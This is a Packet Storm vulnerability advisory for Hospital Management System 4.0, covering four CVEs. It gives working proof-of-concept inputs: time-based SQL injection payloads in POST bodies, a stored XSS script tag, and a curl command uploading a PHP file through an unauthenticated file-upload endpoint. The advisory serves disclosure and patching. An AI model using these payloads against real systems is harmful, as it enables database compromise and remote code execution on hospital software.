Lucene search

Louise Ng, Chris ChanPACKETSTORM:176302

HistoryDec 22, 2023 - 12:00 a.m.

Hospital Management System 4.0 XSS / Shell Upload / SQL Injection

2023-12-2200:00:00

Louise Ng, Chris Chan

packetstormsecurity.com

258

hospital management system

remote attack

arbitrary file upload

sql injection

xss

cve-2020-26627

cve-2020-26628

cve-2020-26629

cve-2020-26630

cvss 7.2

update.

AI Score

7.4

Confidence

Low

EPSS

0.003

Percentile

68.1%

JSON

`Description: Mutiple vulnerabilties were discovered in Hospital Management System  
Affected CMS: Hospital Management System  
Affected Version: <= 4.0  
CVE ID: CVE-2020-26627, CVE-2020-26628, CVE-2020-26629, CVE-2020-26630  
CVSS Score: 7.2 (High)  
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H  
Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd  
  
Multiple vulnerabilities were discovered in Hospital Management System v4.0 and before which allows a remote attacker to execute arbitary web scripts.  
Proof of Concept:  
Attack Vector 1 (Time-Based SQL injection):  
Step 1.) Login admin  
Step 2.) Go to Conatctus Queries -> unread query -> type something in admin remark (e.g test) and submit  
Step 3.) Replace the POST body to below payload and server will respond after 5 second.  
adminremark='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&update=  
  
Attack Vector 2 (Time-Based SQL injection):  
Step 1.) Login admin  
Step 2.) Go to Doctors -> Doctor Specialization -> Click Submit  
Step 3.) Replace the POST body to below payload and server will respond after 5 second.  
doctorspecilization='/**/AND/**/(SELECT/**/1/**/FROM/**/(SELECT(SLEEP(5)))CXde)/**/AND/**/'a'='a&submit=  
  
Attack Vector 3 (Cross Site Scripting (XSS)):  
After attacker login, attacker can append malicious javascript behind their name. Other people will trigger xss when they visit this user.  
Step 1.) Login patient page  
Step 2.) Got to My Profile>Edit Profile.  
Step 3.) Append <ScRiPt >alert("poc")</ScRiPt> behind username and save  
Step 4.) Other user visit this profile will trigger xss  
  
Attacker Vector 4 (Unauthenticated Arbitrary File Upload):  
The HMS is using a vulnerable jquery file upload. Attacker can upload any file to server and trigger it.  
Step 1.) upload file with below curl command:  
curl -i -s -k -X $'POST' \  
-H $'Content-Type: multipart/form-data; boundary=a211583f728c46a09ca726497e0a5a9f' -H $'Host: localhost' -H $'Content-Length: 164' \  
--data-binary $'--a211583f728c46a09ca726497e0a5a9f\x0d\x0aContent-Disposition: form-data; name=\"files[]\"; filename=\"info.php\"\x0d\x0a\x0d\x0a<?php phpinfo(); ?>\x0d\x0a--a211583f728c46a09ca726497e0a5a9f--' \  
$'http://localhost/hsm/hms/admin/vendor/jquery-file-upload//server/php/index.php'  
Step 2.) visit the url in response and trigger the php file.  
  
  
  
Recommendation  
Update to v5.2.0  
  
https://phpgurukul.com/contact-us/  
https://phpgurukul.com/hospital-management-system-in-php  
`